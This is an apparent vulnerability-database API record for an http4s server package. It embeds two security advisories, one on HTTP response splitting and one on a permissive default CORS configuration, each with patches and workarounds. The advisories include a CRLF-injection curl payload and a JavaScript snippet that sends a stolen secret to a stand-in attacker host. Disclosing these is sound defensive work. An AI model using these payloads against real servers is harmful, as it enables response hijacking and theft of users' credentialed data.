Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/501838?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/501838?format=api", "purl": "pkg:maven/org.http4s/http4s-server_2.11@0.14.4a", "type": "maven", "namespace": "org.http4s", "name": "http4s-server_2.11", "version": "0.14.4a", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/42184?format=api", "vulnerability_id": "VCID-1p59-n3nc-d7fg", "summary": "Response Splitting from unsanitized headers\n### Impact\n\nhttp4s is vulnerable to response-splitting or request-splitting attacks when untrusted user input is used to create any of the following fields:\n\n* Header names (`Header.name`å\n* Header values (`Header.value`)\n* Status reason phrases (`Status.reason`)\n* URI paths (`Uri.Path`)\n* URI authority registered names (`URI.RegName`) (through 0.21)\n\nThe following backends render invalid carriage return, newline, or null characters in an unsafe fashion.\n\n| | blaze-server | ember-server | blaze-client | ember-client | jetty-client |\n|:---------------|:-------------|:-------------|:-------------|--------------|--------------|\n| header names | ⚠ | ⚠ | ⚠ | ⚠ | ⚠ | \n| header values | ⚠ | ⚠ | ⚠ | ⚠ | |\n| status reasons | ⚠ | ⚠ | | | |\n| URI paths | | | ⚠ | ⚠ | |\n| URI regnames | | | ⚠ < 0.22 | ⚠ < 0.22 | |\n\nFor example, given the following service:\n\n```scala\nimport cats.effect._\nimport org.http4s._\nimport org.http4s.dsl.io._\nimport org.http4s.server.blaze.BlazeServerBuilder\nimport scala.concurrent.ExecutionContext.global\n\nobject ResponseSplit extends IOApp {\n override def run(args: List[String]): IO[ExitCode] =\n BlazeServerBuilder[IO](global)\n .bindHttp(8080)\n .withHttpApp(httpApp)\n .resource\n .use(_ => IO.never)\n\n val httpApp: HttpApp[IO] =\n HttpApp[IO] { req =>\n req.params.get(\"author\") match {\n case Some(author) =>\n Ok(\"The real content\")\n .map(_.putHeaders(Header(\"Set-Cookie\", s\"author=${author}\")))\n case None =>\n BadRequest(\"No author parameter\")\n }\n }\n}\n```\n\nA clean `author` parameter returns a clean response:\n\n```sh\ncurl -i 'http://localhost:8080/?author=Ross'\n```\n\n```http\nHTTP/1.1 200 OK\nContent-Type: text/plain; charset=UTF-8\nSet-Cookie: author=Ross\nDate: Mon, 20 Sep 2021 04:12:10 GMT\nContent-Length: 16\n\nThe real content\n```\n\nA malicious `author` parameter allows a user-agent to hijack the response from our server and return different content:\n\n```sh\ncurl -i 'http://localhost:8080/?author=hax0r%0d%0aContent-Length:+13%0d%0a%0aI+hacked+you'\n```\n\n```http\nHTTP/1.1 200 OK\nContent-Type: text/plain; charset=UTF-8\nSet-Cookie: author=hax0r\nContent-Length: 13\n\nI hacked you\n```\n\n### Patches\n\nVersions 0.21.29, 0.22.5, 0.23.4, and 1.0.0-M27 perform the following:\n\n* If a status reasoon phrase is invalid, it is dropped. Rendering is optional per spec.\n* If a header name is invalid in a request or response, the header is dropped. There is no way to generically sanitize a header without potentially shadowing a correct one.\n* If a header value is invalid in a request or response, it is sanitized by replacing null (`\\u0000`), carriage return (`\\r`), and newline (`\\n`) with space (` `) characters per spec.\n* If a URI path or registered name is invalid in a request line, the client raises an `IllegalArgumentException`.\n* If a URI registered name is invalid in a host header, the client raises an `IllegalArgumentException`. \n\n### Workarounds\n\nhttp4s services and client applications should sanitize any user input in the aforementioned fields before returning a request or response to the backend. The carriage return, newline, and null characters are the most threatening.\n\nNot all backends were affected: jetty-server, tomcat-server, armeria, and netty on the server; async-http-client, okhttp-client, armeria, and netty as clients.\n\n### References\n* https://owasp.org/www-community/attacks/HTTP_Response_Splitting\n* https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](http://github.com/http4s/http4s)\n* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41084", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00451", "scoring_system": "epss", "scoring_elements": "0.63985", "published_at": "2026-05-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41084" }, { "reference_url": "https://github.com/http4s/http4s", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/http4s/http4s" }, { "reference_url": "https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8" }, { "reference_url": "https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3" }, { "reference_url": "https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41084", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41084" }, { "reference_url": "https://owasp.org/www-community/attacks/HTTP_Response_Splitting", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://owasp.org/www-community/attacks/HTTP_Response_Splitting" }, { "reference_url": "https://github.com/advisories/GHSA-5vcm-3xc3-w7x3", "reference_id": "GHSA-5vcm-3xc3-w7x3", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-5vcm-3xc3-w7x3" } ], "fixed_packages": [], "aliases": [ "CVE-2021-41084", "GHSA-5vcm-3xc3-w7x3" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1p59-n3nc-d7fg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/42224?format=api", "vulnerability_id": "VCID-8w5c-xgr6-fbh6", "summary": "Default CORS config allows any origin with credentials\n### Impact\n\n#### Origin reflection attack\n\nThe default CORS configuration is vulnerable to an origin reflection attack. Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:\n\n```scala\nval routes: HttpRoutes[F] = HttpRoutes.of {\n case req if req.pathInfo === \"/secret\" =>\n Response(Ok).withEntity(password).pure[F]\n}\nval app = CORS(routes.orNotFound)\n```\n\nThe following request is made to our server:\n\n```http\nGET /secret HTTP/1.1\nHost: vulnerable.example.com\nOrigin: https://adversary.example.net\nCookie: sessionId=...\n```\n\nWhen the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting. Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:\n\n```http\nHTTP/1.1 200 OK\nAccess-Control-Allow-Origin: https://adversary.example.org\nAccess-Control-Allow-Credentials: true \nContent-Type: text/plain\n\np4ssw0rd\n```\n\nA malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`:\n\n```javascript\nvar req = new XMLHttpRequest(); \nreq.onload = reqListener; \nreq.open('get','https://vulnerable.example.org/secret',true); \nreq.withCredentials = true;\nreq.send();\n\nfunction reqListener() {\n location='//bad-people.example.org/log?key='+this.responseText; \n};\n```\n\n#### Null origin attack\n\nThe middleware is also susceptible to a Null Origin Attack. A user agent may send `Origin: null` when a request is made from a sandboxed iframe. The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above.\n\n### Patches\n\nThe problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures:\n\n### Migration\n\nThe `CORS` object exposes a default `CORSPolicy` via `CORS.policy`. This can be configured with various `with*` methods, like any http4s builder. Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware:\n\n```scala\nval routes: HttpRoutes[F] = ???\nval cors = CORS.policy\n .withAllowOriginAll\n .withAllowCredentials(false)\n .apply(routes)\n```\n\n### Workarounds\n\nIt is possible to be safe in unpatched versions, but note the following defects exist:\n\n* The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response.\n* Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers.\n* Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches.\n* Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations.\n* Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests. This should be harmless in practice.\n* Needlessly sends `Access-Control-Max-Age` header on non-preflight requests. This should be harmless in practice.\n* Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header. This should be harmless in practice.\n\n#### Explicit origins\n\nIn versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`.\n\n##### 0.21.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORS.DefaultConfig.copy(\n anyOrigin = false,\n allowOrigins = Set(\"http://trusted.example.com\")\n)\nval cors = CORS(routes, config)\n```\n\n###### 0.22.x, 0.23.x, 1.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORSConfig.default\n .withAnyOrigin(false)\n .withAllowedOrigins(Set(\"http://trusted.example.com\"))\nval cors = CORS(routes, config)\n```\n\n#### Disable credentials\n\nAlternatively, sharing responses tainted by credentials can be deprecated.\n\n##### 0.21.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORS.DefaultConfig.copy(allowCredentials = false)\nval cors = CORS(routes, config)\n```\n\n##### 0.22.x, 0.23.x, 1.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORSConfig.default.withAllowedCredentials(false)\nval cors = CORS(routes, config)\n```\n\n### References\n* The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)\n* [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](http://github.com/http4s/http4s)\n* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39185", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00169", "scoring_system": "epss", "scoring_elements": "0.37842", "published_at": "2026-05-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39185" }, { "reference_url": "https://github.com/http4s/http4s", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/http4s/http4s" }, { "reference_url": "https://github.com/http4s/http4s/releases/tag/v0.23.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/http4s/http4s/releases/tag/v0.23.2" }, { "reference_url": "https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39185", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39185" }, { "reference_url": "https://github.com/advisories/GHSA-52cf-226f-rhr6", "reference_id": "GHSA-52cf-226f-rhr6", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-52cf-226f-rhr6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/370855?format=api", "purl": "pkg:maven/org.http4s/http4s-server_2.11@0.21.27", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.11@0.21.27" } ], "aliases": [ "CVE-2021-39185", "GHSA-52cf-226f-rhr6" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8w5c-xgr6-fbh6" } ], "fixing_vulnerabilities": [], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.11@0.14.4a" }